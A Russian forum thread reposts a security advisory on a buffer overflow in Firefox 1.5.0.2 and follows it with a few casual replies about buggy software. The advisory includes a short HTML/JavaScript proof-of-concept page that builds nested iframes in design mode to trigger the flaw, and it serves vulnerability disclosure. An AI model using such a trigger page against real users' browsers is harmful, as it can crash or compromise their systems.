Переполнение буфера в Mozilla Firefox

[Shu_b]

Переполнение буфера в Mozilla Firefox

Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

Код:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo"); 
       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>

URL производителя: mozilla.com

Решение: Способов устранения уязвимости не существует в настоящее время.

* Firefox Remote Code Execution and DoS 1.5.0.2

Источник: securitylab.ru

[Dark_Blaze]

Чет совсем кисло товарисчи...только вышла,а тут столько дыр...

[ALEX(XX)]

Софта без дыр не бывает принципиально. Об этом не стоит забывать. Софт пишут люди, людям свойственно ошибаться.

[Sunix]

в чем отличие хорошего сфота от плохого? дыр бывает много или мало

[Minos]

в чем отличие хорошего сфота от плохого? дыр бывает много или мало

Еще хороший софт быстро обновляется, засекаем...